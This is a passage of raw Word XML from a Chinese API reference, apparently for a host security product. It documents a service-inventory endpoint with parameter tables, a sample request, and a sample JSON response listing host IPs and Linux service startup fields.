          <w:p w14:paraId="78185929" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Interger数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="592173E0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73674D7C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>默认启动模式(仅linux ）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1F965A5C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78152568" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>defaultOpen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E48F839" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>布尔数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30677CD9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D2D5804" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>默认模式启用状态（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="201B4C96" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66154B25" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>isXinetd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59F0AE78" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>布尔数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01621E3E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C2EF289" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>启动方式 （仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="11AED869" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5255DB2A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>showName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42C5B316" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35742677" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43F4640B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>启动项名（仅windows）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0E25FF33" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BB0E286" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BEF193A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EA7AB4D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71636BA8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>服务启动用户windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4578B65A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62BC020B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>enable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61A75AE0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C563F61" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43CA5DAE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>服务的状态windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7F3D16A9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42F861E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>startType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DCFBDA5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35AB32AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03C387CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>启动类型windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="72C60165" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="659B6022" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>publisher</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14C3D33E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="378BB1AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="052B8CD2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>发布者windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="313066DE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E73122" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/service/linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4854C110" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767F693D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId": "fe107d9c77f4c77a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp": "172.16.2.244",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId": 41,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup": "业务组a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "12345",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "标签a"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "initLevel": 5,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "name": "NetworkManager",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "defaultOpen": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "rc0": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "rc1": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "rc2": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "rc3": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "rc4": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "rc5": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "rc6": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "rc7": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "xinetd": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "type": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "user": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "enable": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "startType": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "publisher": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F52E9E"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452"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="2498"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="432DA43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90A14C7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02CBE4AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63104DCF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0385E84E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1FD85F05" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4902C94C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AF13C3C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63A0722E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D494B3F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agent uuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="00B31588" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AC1FFF5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F853C3D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0564A8A9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01A70D3A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0C85E228" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="714DC35E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F4CE4FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53F9CEE5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3183133D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="304F132D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0741C797" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0192A208" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="715ECCE4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CE74BAD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1438841B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="649F6B54" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52E56861" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45E23C89" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="133931CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="700D5C21" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5730B23C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02328B02" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="680B6BB8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19306131" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="77259524" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B945B31" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="157B54B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="376E0297" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12663C57" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="36F0177A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77D7877A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="227547D6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0851A19B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EB16803" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4E570029" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33C17BBD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20B4C207" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
